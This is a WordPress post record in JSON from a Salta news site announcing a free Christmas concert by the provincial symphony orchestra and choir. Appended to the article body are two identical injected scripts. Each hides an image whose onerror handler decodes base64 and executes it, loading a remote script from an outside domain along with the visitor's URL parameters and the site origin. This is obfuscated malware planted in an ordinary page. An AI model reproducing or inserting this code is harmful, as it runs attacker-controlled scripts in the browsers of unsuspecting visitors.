{"id":4718,"date":"2024-12-19T11:04:43","date_gmt":"2024-12-19T14:04:43","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4718"},"modified":"2025-08-13T23:43:04","modified_gmt":"2025-08-14T02:43:04","slug":"la-orquesta-sinfonica-junto-al-estudio-coral-presentan-el-gran-concierto-de-navidad","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4718","title":{"rendered":"La Orquesta Sinf\u00f3nica junto al Estudio Coral presentan el Gran Concierto de Navidad"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-text-color has-link-color wp-elements-73f9eadbb83fa548b2e50a33c9aadb5c\" style=\"color:#760c26\"><strong><em>El cuerpo mayor de m\u00fasica de la Provincia junto al Estudio Coral de Salta se une para presentar un programa especial de Navidad en el Teatro Provincial Juan Carlos Saravia este 20 de diciembre a las 21 horas.<\/em><\/strong><\/h4>\n\n\n\n<p>La Orquesta Sinf\u00f3nica de Salta y el Estudio Coral de Salta se preparan para presentar un Gran Concierto de Navidad en el Teatro Provincial Juan Carlos Saravia con entrada libre y gratuita. El evento tendr\u00e1 lugar este viernes 20 de diciembre a las 21 horas y contar\u00e1 con la direcci\u00f3n de Jorge Mario Uribe, quien tambi\u00e9n ha compuesto algunas de las obras que se interpretar\u00e1n durante la noche.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15327-coro-y-orquesta.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15327-coro-y-orquesta.webp\" alt=\"Coro y orquesta\"\/><\/a><\/figure>\n\n\n\n<p>El concierto incluir\u00e1 una variedad de villancicos de diferentes \u00e9pocas, reunidos y adaptados para orquesta, coro y solista por el Mtro. Jorge Mario Uribe, en las obras \u00abLa Santa \u00c9poca\u00bb, \u00abSonidos de Navidad\u00bb, \u00abChrismas Fantasy\u00bb y \u00abDulce Navidad\u00bb. El programa se completa con \u00abPolonesa\u00bb de Piotr I. Tchaikovsky, \u00abRosas del sur\u00bb y \u00abEljen a Magyar\u00bb de Johann Strauss (Jr.). El tenor Ramon Poliche se unir\u00e1 a la orquesta y el coro para interpretar algunas de estas obras.<\/p>\n\n\n\n<p>El Estudio Coral de Salta, dirigido por Luciano Garay, tambi\u00e9n participar\u00e1 en el concierto, lo que promete ser una noche emocionante de m\u00fasica y celebraci\u00f3n navide\u00f1a. La entrada es libre y gratuita, por lo que todos est\u00e1n invitados a asistir y disfrutar de la m\u00fasica en vivo en el Teatro Provincial Juan Carlos Saravia, ubicado en Zuvir\u00eda 70, Salta.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El cuerpo mayor de m\u00fasica de la Provincia junto al Estudio Coral de Salta se une para presentar un programa especial de Navidad en el Teatro Provincial Juan Carlos Saravia este 20 de diciembre a las 21 horas. La Orquesta Sinf\u00f3nica de Salta y el Estudio Coral de Salta se preparan para presentar un Gran [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4719,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-4718","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4718"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4718"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4718\/revisions"}],"predecessor-version":[{"id":6604,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4718\/revisions\/6604"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4719"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4718"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4718"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4718"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}